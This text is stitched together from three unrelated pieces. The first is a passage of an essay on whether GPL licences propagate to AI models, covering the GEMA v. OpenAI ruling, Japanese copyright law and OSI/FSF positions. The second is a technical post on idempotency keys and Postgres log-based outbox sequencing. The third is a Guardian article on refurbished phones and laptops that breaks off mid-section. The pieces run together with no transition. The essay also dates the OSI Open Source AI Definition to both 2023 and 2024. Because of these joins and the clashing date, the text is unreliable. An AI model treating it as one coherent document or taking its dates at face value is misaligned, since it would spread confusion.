GEMA v. OpenAI: The Theory Treating “Memory” in Models as Legal Reproduction
Another important lawsuit is the case where the German music copyright collective GEMA sued OpenAI. This is a copyright lawsuit concerning the unauthorized training and output of lyrics by an AI model, not AI code generation, but it carries significant theoretical implications related to “license propagation to models” even if not directly related to GPL.
In November 2025, the Munich I Regional Court handed down a judgment on this lawsuit, indicating regarding the matter where the ChatGPT model had memorized and reproduced the lyrics of 9 famous German songs, that the act of “memory” inside the model itself falls under the act of reproduction under copyright law. According to the judgment, the lyrics under the plaintiff’s management were “fixed” in the models of ChatGPT’s GPT-4 and 4o, and the situation was such that the lyrics were output almost verbatim just by the user giving a simple prompt. Based on this, the court determined that the model contains “parameters that memorized the work” internally, and if it is possible to reproduce an expression substantially identical to the original work for a human by means of an appropriate prompt, that memory itself falls under “reproduction” in Article 16 of the German Copyright Act. Furthermore, it determined that the act of actually outputting lyrics in response to a prompt is also a separate act of reproduction, and providing lyrics to the user falls under the act of making available to the public (public transmission). Also, it ruled that since all of these are done without the permission of the rights holder, they deviate from the scope justified by the TDM (Text and Data Mining) exception in the EU DSM Copyright Directive.
The important point of this judgment is that it clearly acknowledged that “if a work is recorded inside the model in a reproducible form, that state itself can constitute copyright infringement.” The court cited the text of the EU InfoSoc Directive that “reproduction includes copies in any form or manner, and does not need to be directly perceptible to humans,” and stated that in the spirit of this, even if the lyrics are encoded within the model’s parameters, it amounts to the creation of a reproduction. It went as far as to mention that “encoding in the form of probabilistic weights does not prevent it from being considered a copy,” showing a strong recognition that differences in technical formats cannot avoid the nature of reproduction under copyright law. Also, since the fact that the model could output the lyrics was not coincidental but highly consistent, it was factually found that “the direct incorporation of the essential part of the training data” occurred rather than the result of statistical learning. As a result, the Munich District Court recognized OpenAI’s liability for injunction and damages regarding the output act of the lyrics in question, and further ordered the provision of information regarding training data and output content for the future. However, this judgment is the first instance, and since OpenAI has indicated an intention to appeal, it is expected to be a continuing dispute.
The noteworthy theory shown by this GEMA judgment is the extension of the concept of reproduction under copyright law to the interior of the model. That is, if the work used as training data remains within the model and can be reproduced with a simple operation, it means the model already contains a reproduction of that work. This theory is groundbreaking in that it deems “the model contains the source work,” and indeed, in a commentary by Osborne Clarke, it is evaluated that “in contrast to the judgment of the English High Court in the
Getty v. Stability AI
case, the Munich District Court explicitly recognized the possibility that the AI model contains copies of the training material.” Standing on this view, the model is not merely a result of analysis, but depending on the case, can be evaluated as an aggregate of the training data itself.
However, it is necessary to keep in mind that this judgment is based on an extreme case where a complete match output was obtained with short text such as lyrics. The court itself stated, “Normally, temporary reproduction for learning remains within the purpose of analysis and does not infringe on the rights holder’s market, but in this case, the model holds the work in a restorable form and exceeds the scope of analysis,” emphasizing that the judgment is limited to “cases where the model performs complete reproduction.” Also, as the UK case shows, judicial decisions vary by country, and a legal consensus on this issue has not yet been formed.
Nevertheless, the judgment this time, which declared that the recording of a work inside a model is a reproduction, can become a major basis supporting the license propagation theory. This is because, while the premise for discussing GPL propagation is “whether the model can be said to be a reproduction or derivative work of the GPL code,” the logic of the Munich District Court legally certified exactly that “a model can be a reproduction of training data”.
Possibilities Derived from the Current Status of the Two Lawsuits
From the two lawsuits above, we can consider the path through which the theory of license propagation to AI models might be recognized in the future.
Let us assume the worst-case scenario from the perspective of AI operators, where these lawsuits are finalized with the plaintiffs winning. In the Copilot litigation, the judgment that “model providers must comply with the license conditions of the training source code” would be established, and in the GEMA litigation, the legal principle that “the model encompasses reproductions of the work” would be established. When these two intersect, the conclusion that “since an AI model containing GPL code is a reproduction or derivative work of the GPL code, the conditions of the GPL directly apply to its provision” is theoretically derived. That is, the possibility emerges that the theory of GPL propagation to models is effectively ratified by the judiciary.
Specifically, if the model memorizes and contains GPL code fragments internally, the act of distributing or providing that model to a third party may be regarded as the distribution of a reproduction of GPL code; in that case, the act of distribution under conditions other than GPL would be evaluated as a GPL license violation. If a GPL violation is established, there would be room to argue for remedies such as injunctions and claims for damages, as well as forced GPL compliance demanding the disclosure of the entire model under the same license, just as in the case of ordinary software. In fact, the remedies GEMA sought from OpenAI included disclosure regarding training data and output content, and although this is in the context of musical works, this can be said to be a type of disclosure request to make transparent “what the model learned and contains.” In the case of a GPL violation as well, the possibility cannot be denied that demands such as “disclosure of the GPL code parts contained inside the model” or “source disclosure in a form that allows reconstruction of the model” would emerge in seeking license compliance.
Even if not reaching such an extreme conclusion, an intermediate scenario could involve imposing certain restrictions on model providers. For example, the Copilot litigation might be settled or judged by taking measures such as “attaching a license and author attribution at the time of output if existing code of a certain length or more is included in the generated code,” or technically mandating the implementation of filters so that GPL code fragments are not extracted or reproduced from the model. In fact, GitHub, the developer of Copilot, has already introduced an optional feature that “excludes from suggestions if the candidate code matches existing code on large-scale repositories,” attempting to reduce litigation risk. Also regarding OpenAI, there are reports that it strengthened filters so that ChatGPT does not output copyrighted lyrics as they are, in response to the GEMA judgment.
While these are not license propagation itself legally, in practice, they indicate that the industry is steering in the direction of “ensuring the model does not potentially infringe license conditions.” In the future, there is a possibility that guidelines for excluding data with specific license terms like GPL at the model training stage, or mechanisms and systems to guarantee that there is no license-infringing output by conducting output inspections after training, will be established.
In any case, until these two lawsuits are completely settled and the subsequent legislative response is determined, the “theory of GPL propagation to models” has not completely disappeared. It is a scenario that could suddenly become realistic depending on future judgments, and even if the plaintiffs lose in the lawsuits, there is a possibility that support for this theory will reignite within the open source community. It is necessary to note that while it is currently an “undetermined theory not shouted as loudly as before,” that does not mean it has been legally completely denied and resolved. As our community, we need to carefully consider countermeasures while observing these trends and taking into account the legal systems of each country and opposing arguments described in the latter half of this article.
Treatment under Japanese Law
Based on the trends of the overseas lawsuits mentioned above, I will also organize the relationship between AI models, copyrighted works, and licenses under Japanese law. In Japan, Article 30-4 of the Copyright Act, introduced by the 2018 amendment, exists as a provision that comprehensively legalizes reproduction acts associated with machine learning. Furthermore, in March 2024, the Copyright Division of the Council for Cultural Affairs of the Agency for Cultural Affairs published a guideline-like document titled “Thought on AI and Copyright” (hereinafter “the Thought”), presenting a legal organization divided into the development/training stage and the generation/utilization stage of generative AI.
According to “the Thought,” reproduction performed basically for the purpose of AI training is legal as long as it satisfies “information analysis not for the purpose of enjoying the thoughts or sentiments expressed in the work” as defined in Article 30-4. Therefore, acts of collecting and reproducing a wide range of data from the internet to create a training dataset for research and development purposes can be done without the permission of the rights holders in principle. However, what is important is whether an “purpose of enjoyment” is mixed into that training act. “The Thought” states that if training is conducted with the purpose of “intentionally reproducing all or part of the creative expression of a specific work in the training data as the output of generative AI,” it is evaluated as having a concurrent purpose of enjoying the work rather than mere information analysis, and thus lacks the application of Article 30-4. As a typical example of this, “overfitting” is cited, and acts such as making a model memorize specific groups of works through additional training to cause it to output something similar to those works are judged to have a purpose of enjoyment.
Furthermore, “the Thought” also mentions the legal treatment of trained models, stating first that “trained models created by AI training cannot be said to be reproductions of the works used for training in many cases.” This is the view that since the model can generate outputs unrelated to the original in response to various inputs in a general-purpose manner, the model itself is not a copy of any specific work.
However, “the Thought” simultaneously acknowledges the possibility that, exceptionally, in cases where “the trained model is in a state of generating products with similarity to the work that was training data with high frequency,” the creative expression of the original work remains in the model, and it may be evaluated as a reproduction. It also points out that in such cases, the model is positioned as a machine for copyright infringement, and a claim for injunction may be recognized. In short, usually the model is merely statistical data and not the work itself, but if it has turned into a device for spewing out specific works almost as they are, it can be treated as an infringing item; this thinking shares parts with the content of the GEMA judgment.
It is necessary to note that the above organization is strictly a discussion of the scope of application of rights limitation provisions (exception provisions) under the Copyright Act, and does not touch upon the validity of contracts or license clauses. The Agency for Cultural Affairs document discusses from the perspective of “whether it is copyright infringement or not,” and does not deny that even if the training act is legal, contractual liability may arise if it violates terms of service or open source licenses separately. Also, no in-depth view has been shown regarding the propagation of copyleft clauses like the GPL. In Japan’s Copyright Act, there is no override provision where rights limitation provisions like Article 30-4 take precedence over contract conditions, and the “Contract Guidelines on Utilization of AI and Data” by the Ministry of Economy, Trade and Industry suggests the possibility that if there is a contract prohibiting data use between parties, that contract takes precedence.
Therefore, if the license is regarded as a valid contract, even if “training is legal” under Article 30-4 of the Copyright Act, the risk remains that it becomes a “violation of license conditions” under contract law, and it can be said that at least there is no official view organizing the theory of GPL propagation to models. In other words, currently, while the legality of model training acts is recognized quite broadly under the Copyright Act, license violation is left to general civil theory, and there is no clear guideline on, for example, “whether the act of publicly distributing a model trained on GPL code constitutes a GPL license violation.” Overall, the legal organization in Japan is in a situation of “safe in principle at the copyright layer, but blank at the contract layer.” Hence, the discussion in Japan regarding the theory of GPL propagation to models relies on future judicial judgments and legislative trends, and at present, there is no choice but to consider operational guidelines carefully following the organization by the Agency for Cultural Affairs.
Arguments Negating the Theory of License Propagation to Models
As seen in the previous sections, the theory of GPL propagation to models is not legally zero. However, many legal experts and engineers point out that this theory has serious detrimental effects. Here, I present representative arguments negating the theory of license propagation to models from the layers of copyright law, GPL text, technology, and practical policy.
Arguments for Negation at the Copyright Law Layer
First, under copyright law, it is unreasonable to regard an AI model as a “derivative work” or “reproduction” of the training source works. In many cases, the expressions of specific works are not stored inside the model in a form recognizable to humans. The model merely holds statistical abstractions where text and code have been converted into weight parameters, and that itself is not a creative expression to humans at all. A “derivative work” under copyright law refers to a creation that incorporates the essential features of the expression of the original work in a form that can be directly perceived, but one cannot directly perceive the creativity of the original code from the model’s weights. In other words, the model does not show the nature of a work directly enough to be evaluated as encompassing the original code. For example, the High Court of Justice in the UK stated in the judgment of the
Getty v. Stability AI
case that “the Stable Diffusion model itself is not an infringing copy of the training images,” showing a negative view on regarding the model itself as a reproduction of works. Thus, there are many cautious positions internationally regarding regarding the model itself as an accumulation of works or a compilation work.
Also, the output generated by the model involves probabilistic and statistical transformations, and in many cases, things that do not resemble the training source at all are output. Even if a match or similarity occurs by chance, it is difficult to prove whether it is a reproduction relying on the original or an accidental similarity. It is not realistic to conduct the certification of reliance and similarity required to discuss copyright infringement for the entire model. Ultimately, in the framework of copyright law, there is no choice but to judge “whether the model relies on a specific work” on a work-by-work basis, and recognizing uniform copyrightability or infringing nature for the model itself is a large leap. As organized in Japanese law where the model is not considered a reproduction in most cases, the schematic of model equals work is considered unreasonable under copyright law.
Arguments for Negation at the GPL Text Layer
Next, looking at the license text and intent of the GPL itself, doubts are cast on the interpretation that GPL propagates to AI models. For example, in the text of GPLv2, the target of copyleft is limited to “derivative works” of the original code provided under GPL and “works that contain the Program.” Typically, this has been interpreted as software created by modifying or incorporating GPL code, or software combined (linked) with GPL code. In the case of an AI model, it is extremely unclear which part of the original GPL code the model “contains.” Even if the model could memorize fragments of the GPL code used for training, it is a tiny fraction when viewed from the entire model, and most parts are occupied by parameters unrelated to the GPL code. There is no clear assumption shown by the GPL drafters as to whether a statistical model that may partially encapsulate information derived from GPL code can be said to be “a work containing the Program”.
Furthermore, GPLv3 requires the provision of software source code in a “preferred form for modification.” If an AI model is a GPL derivative, the problem arises as to what that preferred form for modification would be. The model weights themselves have low readability and editability for humans, and are hard to call a “preferred form for modification.” If we ask whether the training data is the source code, the original trained GPL code itself cannot be said to be the source of the model, nor is it clear if it refers to the entire vast and heterogeneous training dataset. It is difficult to define what should be disclosed to redistribute the model under GPL compliance, and it could lead to an extreme conclusion that all code and data used for model training must be disclosed. While this is what some freedom believers aim for, it can only be said to be unrealistic in reality, and it deviates from the point of the GPL’s intent to enable users to modify and build from source. Thus, existing GPL provisions are not designed to directly cover products like AI models, and forcing their application causes discrepancies in both text and operation.
In fact, in the “Open Source AI Definition” compiled by the OSI (Open Source Initiative) in 2023, regarding “information necessary for modification” of the model, it stopped at stating that sufficiently detailed information about the training data should be disclosed, and did not require the provision of the training data itself in its entirety. Also, it states that model weights and training code should be published under OSI-approved licenses.
In addition, the FSF (Free Software Foundation) itself does not believe that the current GPL interpretation alone can guarantee freedom in the AI domain, and announced in 2024 that it has started formulating “conditions for machine learning applications to be free.” There, the directionality is shown that “the four freedoms should be guaranteed to users including not only software but also raw training data and model parameters,” but this conversely is a recognition that this is not guaranteed under current licenses. The FSF also points out that “since model parameters cannot be said to be source comprehensible to humans, modification through retraining is more realistic than direct editing,” and can be said to be cautious about treating models on the extension of existing GPL. Overall, claiming GPL propagation univocally to AI models that fall outside the wording and assumptions of GPL provisions is unreasonable from the perspective of interpretation.
Arguments for Negation at the Technical Layer
There are also strong counterarguments from a technical perspective against the theory of GPL propagation to models. AI models, particularly those called large language models, basically hold huge statistical trends internally and do not store the original code or text as they are like a database. Returning a specific output for a specific input is merely generation according to a probability distribution, and it is not guaranteed that the same output as the training data is always obtained. If the model does not perform verbatim reproduction of training data except for a very small number of exceptional cases, evaluating it as “containing GPL code” within the model does not fit the technical reality. In fact, the OpenAI side argued in the GEMA lawsuit that “the model does not memorize individual training data, but merely reflects knowledge learned from the entire dataset in parameters.” This argument was not accepted by the Munich District Court, but that was because there was a clear example of lyric reproduction; conversely, unless there is a clear example of reproduction, the view would be that “the model is a lump of statistical knowledge”.
Furthermore, although it has been confirmed that models can output fragments of training data, that proportion is considered extremely limited when viewed from the whole. Regarding the whole as a reproduction based on the existence of partial memory is like claiming the whole is a reproduction of a photograph just because it contains a tiny mosaic-like fragment in an image, which is an excessive generalization. Technically, it is difficult to quantitatively measure how far specific parameters of the model retain the influence of the original data, and the correspondence between the model and training data remains statistical and difficult to draw a line. Therefore, criteria such as “how similar must it be for GPL to propagate?” cannot be established in the first place. The judgment of infringement or not has to be done on an individual output basis, and this would not be consistent with the idea of applying a single license to the entire model. From the technical aspect, since the model is basically a statistical transformation and the majority is unrelated to GPL code, applying GPL collectively can be said to be irrational.
Practical and Policy Arguments for Negation
Finally, major demerits can be pointed out regarding the theory of license propagation to models from practical and policy perspectives. What would happen if this GPL propagation theory were legally recognized? As an extreme example, if 1 million code repositories were used for training a certain large-scale model, all the various licenses contained in them (GPL, MIT, Apache, proprietary, etc.) would “propagate” to the model, and the model provider would have to distribute the model in a form that complies with all 1 million license clauses. As a practical matter, there would be combinations where conditions contradict, such as GPLv2 and Apache-2.0, and attaching and managing a huge collection of copyright notices for one model is nothing but unrealistic. Applying all licenses to an AI model created from training data with mixed licenses is practically bankrupt, and eventually, the only thing that can be done to avoid it would be to exclude code with copyleft licenses like GPL from the training data from the start.
Is such a situation really desirable for our community? The spirit of the GPL is to promote the free sharing and development of software. However, if asserting excessive propagation to AI models causes companies to avoid using GPL code, and as a result, the value held by GPL software is not utilized in the AI era, it would be putting the cart before the horse. In the field of software development, many companies take a policy of not mixing GPL code into their own products, but similarly, if it becomes “do not include GPL in our AI training data,” GPL projects could lose value as data sources. Furthermore, the current legal battles surrounding AI are leaning more towards monetary compensation and regulatory rule-making, and the reality is that they are proceeding in a different vector from the direction of code sharing idealized by GPL. If only the theory of GPL propagation to models walks alone, in reality, only data exclusion and closing off to avoid litigation risks will progress, and there is a fear that it will not lead to the expansion of free software culture.
Policy-wise as well, governments of each country are carefully considering the use of copyrighted works in AI, but at present, there is no example establishing an explicit rule that “license violation of training data generates legal liability for the model.” Even in the EU AI Act, while there are provisions regarding the quality and transparency of training data, it does not demand compliance with open source licenses. Rather, from the perspective of promoting open science and innovation, the movement to allow text and data mining under rights limitations is strong. In Japan as well, as mentioned earlier, the direction is to broadly recognize information analysis use under Article 30-4, and the policy of forcibly applying licenses to AI models is not mainstream in current international discussions.
Based on the above, the theory of license propagation to models is highly likely to cause disadvantages to open source on both practical and policy fronts, and can be said not to be a realistic solution. What is important is how to realize the “freedom of software,” which is the philosophy of open source, in the AI era; the opinion that this should be attempted through realistic means such as ensuring transparency and promoting open model development rather than extreme legal interpretations is potent, and this is something I have consistently argued as well.
The Stance of OSI and FSF
I will also organize what stance major organizations in the open source (and free software) community are currently taking in relation to the theory of GPL propagation to AI models. Representative organizations are the Open Source Initiative (OSI) and the Free Software Foundation (FSF); while they share the goal of software freedom, they do not necessarily take the same approach regarding AI models and training data.
First, the OSI formulated the “Open Source AI Definition” (OSAID) in 2024, defining the requirements for an AI system to be called open source. This definition states that the four freedoms (use, study, modify, redistribute) similar to software should be guaranteed for AI systems as well, and defines requirements regarding “forms necessary for modification” to realize that, requiring the disclosure of the following three elements.
Data Information: Provide sufficiently detailed information about the data used for training so that a skilled person can reconstruct an equivalent model.
This does not make publishing the training data itself in its entirety mandatory, but requires disclosing the origin, scope, nature, and acquisition method if there is data that cannot be published, listing data that can be published, and providing information on data available from third parties.
Code: Publish the complete set of source code for training and running the model under an OSI-approved license.
Parameters: Publish the model weights (parameters) under OSI-approved conditions.
It should be noted that while OSI states that information regarding the code used for training and training data is indispensable in addition to model weights to realize “Open Source AI,” it does not require the complete disclosure of the training data itself. This is a flexible stance that, for example, if raw data cannot be published due to privacy or confidentiality, explaining the nature of the data by clarifying that fact can substitute. Also, the legal mechanism to ensure free use of model parameters is an issue to be clarified in the future, and at present, no conclusion has been reached on legal rights control (e.g., presence or absence of copyrightability) over parameters either.
As can be read from these, the OSI promotes opening up AI models at the level of the open source definition in principle, but keeps the handling of training data to requirements at the information disclosure level. Thereby, it can be said that the OSI avoids adopting the theory of license propagation to models to demand training data disclosure, and is exploring a realistic solution that first guarantees transparency and reproducibility. In principle, it could be said that the OSI denied the GPL propagation theory at the time of publishing the OSAID definition. Note that I am probably the one who sealed the mandatory argument for training data in the final stage of this definition’s formulation process, and I believe this was the correct judgment.
On the other hand, the FSF and FSF Europe (FSFE) take a stance more faithful to fundamental principles. FSFE declared as of 2021 that “for an AI application to be free, both its training code and training data must be published under a free software license.” That is, to modify or verify the model, one must be able to obtain it including the training data, and therefore both must be free. Also, the FSF itself stated in a 2024 statement, “Under current understanding, for an ML application to be called free, all training data and the scripts processing it must satisfy the four freedoms,” trying to extend the requirements of freedom to data. Thus, FSF/FSFE stands on the position that a model with undisclosed training data is unfree as a whole even if the software part is free.
However, the FSF simultaneously states to the effect that “whether a non-free machine learning application is ethically unjust depends on the case,” mentioning that there can be “legitimate moral reasons” for not being able to publish training data (personal information) of a medical diagnosis AI, for example. In that case, it implies that although that AI is non-free, its use might be ethically permitted due to social utility. One can see an attitude of seeking a compromise between the FSF’s ideal and reality here, but in any case, there is no mistake that the FSF ultimately aims for freedom including training data.
So, does the FSF support the theory of GPL propagation to AI models? Not necessarily. Their claim is closer to an ethical standard or ideal image rather than legal enforceability, and they are not arguing that it applies to models as an interpretation of the current GPL license. Rather, as mentioned before, they are at the stage of trying to create new standards and agreements. Even in the white paper on the Copilot issue funded by the FSF, while legal points such as copyright and license violation are discussed, substantially it has a strong aspect of being told as a GPL compliance problem for users (downstream developers) concerned that they bear the risk of GPL violation if Copilot’s output contains GPL code fragments. This is a caution to developers using AI coding tools rather than GPL application to the model itself, and is different from an approach forcing GPL compliance directly on model providers.
The Software Freedom Conservancy (SFC) naturally has a strong interest in this issue but is also cautious in some respects. The SFC started the protest campaign “Give Up GitHub” against GitHub in 2022, condemning Copilot’s methods as contrary to the philosophy of open source, and is also involved in the Copilot class action. However, in an SFC blog post, regarding this lawsuit, it showed concern about “the risk of interpretations deviating from the principles of the open source community being brought in,” and called on the plaintiffs’ side to comply with community-led GPL enforcement principles as well. The SFC also states that Copilot’s act is an “unprecedented license violation,” and while not fully denying the GPL propagation theory, it can be interpreted as fearing that a judicial precedent undesirable for the community might be created depending on the result of the legal battle. The SFC might be said to be carefully balancing between the aspect of pursuing GPL propagation and the risk of entrusting it to the judiciary.
Finally, what is concerned as the free software camp is that excessive propagation of licenses might conversely invite results that impair freedom. Both OSI and FSF ultimately want to make AI something open that anyone can utilize, but they are carefully assessing whether increasing the purity of legal theory in demands for full data disclosure really leads to achieving the objective. Considering the demerits such as the avoidance of open data due to excessive propagation interpretation or the atrophy effect due to a flurry of lawsuits, I feel that the major organizations share a commonality in that it is essential not to lose sight of the big picture of spreading freedom. Rather than inciting GPL application to models, the pursuit of realistic solutions such as how to make models and data open and which parts should be relaxed in line with reality will likely continue in the future.
Summary
I have looked at the current state of the theory of GPL propagation to AI models above, and as a conclusion, this theory is in a halfway position where “it is not touted as loudly as before, but it has not completely disappeared.” As a result of points such as license violation of training data and reproduction within the model beginning to be scrutinized in lawsuits like the Copilot class action and
GEMA v. OpenAI
, it even appears that the hurdle for infringement certification is lowering. In fact, the Munich District Court’s judgment deemed model memory as reproduction, and the claim of open source license violation survives in the Copilot litigation.
However, on the other hand, the hurdle for the propagation of licenses like GPL remains high. There is a large gap between infringement being recognized and the conclusion that the entire model must be disclosed under GPL etc. immediately. What the current lawsuits are seeking is also injunctions and damages, not the forced GPL-ization of the model. There are zero examples where the judiciary supported the theory of GPL propagation to models itself, and it is a legally uncharted territory. Even if that claim were attempted somewhere in the future, it would face the legal, technical, and practical counterarguments mentioned earlier.
However, the situation has fluid parts, and there is a possibility that the line will shift depending on the policies of each country and the trends of the community. For example, if pressure from rights holder groups strengthens in Europe, there is a possibility that guidelines including license compliance will be formulated. Also, if a consensus is formed within the community regarding the state of copyleft in the AI era, a new license might appear. If such changes occur, a phase where the theory of propagation to models is re-evaluated will also arrive.
To offer my personal opinion, what is important at this moment is the perspective of how to balance software freedom and freedom in the AI domain. Instead of blindly trying to apply the philosophy of copyleft to AI, it is necessary to think about what is best to maximize freedom while considering the technical nature and industrial structure peculiar to AI. Fortunately, solutions to practical problems such as the open publication of large-scale AI models, dataset cleaning methods, and automated attachment of license notices are already being explored by the open source community. Promoting such voluntary efforts and supporting them with legal frameworks as necessary will likely be the key to balancing freedom and development.
The theory of GPL propagation to models is a point where judgment is divided on whether it is an ideal to be pursued or a nightmare to be avoided. However, as stated in this article, seeing the situation in the current year of 2025, it is not a situation where it will become reality immediately, and the majority of the community is likely maintaining a cautious stance. Although it is speculated that trial and error will continue in the judicial, legislative, and technical aspects in the future, as our community, we need to continue exploring the point of compatibility between technological innovation and software freedom without jumping to hasty conclusions. That process itself can be said to be a new challenge in the AI era on the extension of the free software spirit.
In distributed systems, there’s a common understanding that it is not possible to guarantee exactly-once delivery of messages.
What is possible
though is
exactly-once processing
. By adding a unique idempotency key to each message, you can enable consumers to recognize and ignore duplicate messages, i.e. messages which they have received and successfully processed before.
Now, how does this work exactly? When receiving a message, a consumer takes the message’s idempotency key and compares it to the keys of the messages which it already has processed. If it has seen the key before, the incoming message is a duplicate and can be ignored. Otherwise, the consumer goes on to process the message, for instance by storing the message itself, or a view derived from it, in some kind of database.
In addition, it stores the idempotency key of the message. Critically, these two things must happen atomically, typically by wrapping them in a database transaction. Either the message gets processed
and
its idempotency key gets persisted. Or, the transaction gets rolled back and no changes are applied at all. That way, it is ensured that the consumer will process a message again upon redelivery, if it failed to do so before. It also is ensured that duplicates received after successfully processing the message are skipped over.
UUIDs
So let’s discuss what makes for a good idempotency key then. One possible option would be to use a UUIDv4. These random identifiers solve the requirement of uniquely identifying each message. However, they require the consumer to store the UUIDs of all the previous messages it ever has received in order to reliably identify a duplicate. Depending on the message volume, this may not be practical. Pragmatically, you might get away with discarding received UUIDs after some time period, if it is acceptable to occasionally receive and process a duplicate after that period. Unfortunately, neither the producer of the message nor the consumer will have any indication of the duplicated processing in that case.
We can somewhat improve this situation by adding a timestamp to the idempotency key, for instance by using a
UUIDv7
which contains both a timestamp part (first 48 bits) and a random part (remaining bits), or an
ULID
. That way, the consumer can detect when it receives a message with an idempotency key which is "too old". While it can’t decide whether the message is a duplicate or not, it can flag to the producer that it can’t handle that message. It is then upon the producer to decide how to proceed. For instance, if the message is part of a payment flow, the system might suggest to the user to first check in their banking account whether this payment has already been executed or not. Only if that’s not the case, a
new
message with the same payload and a fresh UUID would be sent.
Monotonically Increasing Sequences
All these intricacies can be avoided when it is possible to use a monotonically increasing sequence value as the idempotency key. In that case, the consumer does not need to store all the keys it ever has processed (or a reasonably sized subset thereof). It only needs to store a single value, the one of the latest message which it has processed. If it receives a message with the same or a lower idempotency key, that message must be a duplicate and can be ignored. When receiving messages from a partitioned source, such as a Kafka topic with multiple partitions, or from multiple independent producers (e.g., different clients of a REST API, each using their own separate sequence), then the latest key value per partition must be stored.
Monotonically increasing idempotency keys are a great improvement from the perspective of the message consumer. On the flipside, they may make things more complicated for producers: creating monotonically increasing sequence values isn’t without its own challenges. It is trivial if producers are single-threaded, producing one message at a time. In that case, a database sequence, or even a simple in-memory counter, can be used for creating the idempotency keys. Gaps in the sequence are fine, hence it is possible to increment the persistent state of the sequence or counter in larger steps, and dispense the actual values from an in-memory copy. That way, disk IO can be reduced. From a consumer perspective, Kafka partition offsets fall into that bucket, as they can be considered a monotonically increasing idempotency key for the messages consumed from a given partition.
Things get more complicated when the producer is subject to multiple concurrent requests at once, for instance a REST service with multiple request workers, perhaps even scaled out to multiple compute nodes in a cluster. To ensure monotonicity, retrieval of the idempotency key and emitting a message with that key must happen atomically, uninterrupted by other worker threads. Otherwise, you may end up in a situation where thread A fetches sequence value 100, thread B fetches sequence value 101, B emits a message with idempotency key 101, and then A emits a message with idempotency key 100\. A consumer would then, incorrectly, discard A’s message as a duplicate.
For most cases, ensuring this level of atomicity will impose a severe bottleneck, essentially serializing all requests of the producer system, regardless of how many worker threads or service
instances you deploy. Note that if you really wanted to go down that route, solely using a database sequence for producing the idempotency key will not work. Instead, you’d have to use a mechanism such as
Postgres advisory locks
in order to guarantee monotonicity of idempotency keys in the outgoing messages.
Deriving Idempotency Keys From the Transaction Log
Now, is there a way for us to have this cake and eat it too? Can we get the space efficiency for consumers when using monotonically increasing idempotency keys, without hampering performance of multi-threaded producers? Turns out we can, at least when the emission of messages can be made an asynchronous activity in the producer system, happening independently from processing inbound requests.
This means clients of the producer system receive confirmation that the intent to send a message or request was persisted, but they don’t get the result of the same right away.
If a use case can be modeled with these semantics, the problem can be reduced to the single-threaded situation above: instead of emitting messages directly to the target system, each producer thread inserts them into a queue. This queue is processed by a single-threaded worker process which emits all the messages sequentially. As argued in
The Synchrony Budget
, making activities asynchronous can be generally advantageous, if we don’t require their outcome right away.
One specific way to do so would be a variation of the widely used
outbox pattern
, utilizing the transaction log of the producer service’s database. After all, it’s not necessary to sequence inbound requests ourselves as the database already is doing that for us when serializing the transactions in its log. When producers persist the intent to send a message in the transaction log—for instance by writing a record into a specific table—a process tailing the log can assign idempotency keys to these messages based on their position in the transaction log.
An implementation of this is straight-forward using tools for log-based Change Data Capture (CDC), such as
Debezium
: You retrieve the messages to be sent from the log by capturing the INSERT events from the outbox table, and assign an idempotency key before emitting them, derived from their log offset. The exact details are going to depend on the specific database.
For example, in Postgres
it is ensured
that the log sequence numbers (LSN) of commit events within its write-ahead log (WAL) are monotonically increasing: the commit event of a transaction committing after another transaction will have a higher LSN. Furthermore, it is guaranteed that within a given transaction, the LSNs of the events are also monotonically increasing. This makes the tuple of
{ Commit LSN, Event LSN }
a great fit for an idempotency key. In order to not leak the fact that a producer is using a Postgres database, both values can be encoded into a single 128 bit number value. Note that you don’t need to deploy Kafka or Kafka Connect for this solution. Debezium’s
embedded engine
is a great fit for this use case, allowing you to assign idempotency keys from within a callback method in the producer service itself, not requiring any further infrastructure.
When using Postgres to implement this pattern, you don’t even need a dedicated outbox table, as it lets you write arbitrary contents into the transaction log via
pg_logical_emit_message()
, which is perfect for the use case at hand.
Discussion
So, when to use which kind of idempotency key then?
As always, there are no silver bullets, and the answer depends on your specific use case.
For many scenarios, using UUIDs and dropping them after some time will probably be sufficient,
provided you can tolerate that messages occasionally can be processed a second time when duplicates arrive after the retention period of processed keys.
The more messages you need to process overall,
the more attractive a solution centered around monotonically increasing sequences becomes,
as it allows for space-efficient duplicate detection and exclusion, no matter how many messages you have.
The proposed log-based approach can be an efficient solution for doing so,
but it also adds operational complexity:
your database needs to support logical replication,
you need to run a CDC connector, etc.
However, many organizations already operate CDC pipelines for other purposes
(analytics, search indexing, cache invalidation, etc.). If you’re in that category,
the incremental complexity is minimal. If you’re not, you should weigh the operational
overhead against the benefits (constant-space duplicate detection) for your specific scale.
Don’t buy new tech this Black Friday: expert tips for buying refurbished phones and laptops
Guardian
www.theguardian.com
2025-11-27 12:00:25
Tech is on its last legs? Refurbished can be the cheaper, greener option. Here’s how to choose well and avoid the pitfalls • How to shop smart this Black Friday• How to make your phone last longer Even if you do your best to avoid it, it’s hard to escape the noise of retailers offering implausible-s...
E
ven if you do your best to avoid it, it’s hard to escape the noise of retailers offering implausible-seeming Black Friday discounts on desirable technology. What they won’t be so keen to highlight is the huge environmental cost that comes from feeding the capitalist beast year on year, given what an obvious sales vibe-killer it would be.
While the best approach for the planet is to opt out completely and observe the alternate holiday of
Buy Nothing Day
instead, such an approach can prove self-defeating to your finances in the long term. If you
shop smart on Black Friday
and avoid the lure of impulse buys, it’s a good time to stock up on the things you need, at lower prices than at the rest of the year.
In other words, if your phone, laptop or TV is on its figurative last legs, Black Friday is a sensible time to seek a replacement. But if you’re hoping to limit your ecological impact, it’s definitely worth considering refurbished options.
“As a consumer, you save directly 30-40% versus new, and you also have this feeling of doing the right thing,” says Peter Windischhofer, co-founder and CEO of
Refurbed
. “Because you buy a product that already exists, you don’t have to produce a new one.”
James Rigg, CEO of Trojan Electronics, agrees: “Very often, it’s the better choice: reliable performance, lower prices and a fraction of the environmental cost.
“Buy from someone reputable, look for transparency, and prioritise warranty and repairability over a too-good-to-be-true discount, and you can come out of Black Friday with great devices and a lighter footprint.”
Five tips when buying refurbished
Read the description
Refurbished can mean different things. See what condition is promised, paying special attention to battery health.
Check the warranty and returns policy
You want to know that you’re in good hands should anything go wrong.
Research the seller’s reputation
Look at customer reviews and internet feedback. If on eBay, look for sellers in the company’s
Refurbished
programme.
Research your chosen device
The older the device, the bigger the discount – but this is a false economy if you have to replace it sooner. With phones and laptops, especially, make sure they’re getting updates and will be able to cope with years of use.
Don’t cheap out
A low price is only a bargain if it actually delivers. Prioritise customer service and a transparent refurbishment process over saving a few pounds.
Refurbished vs pre-owned
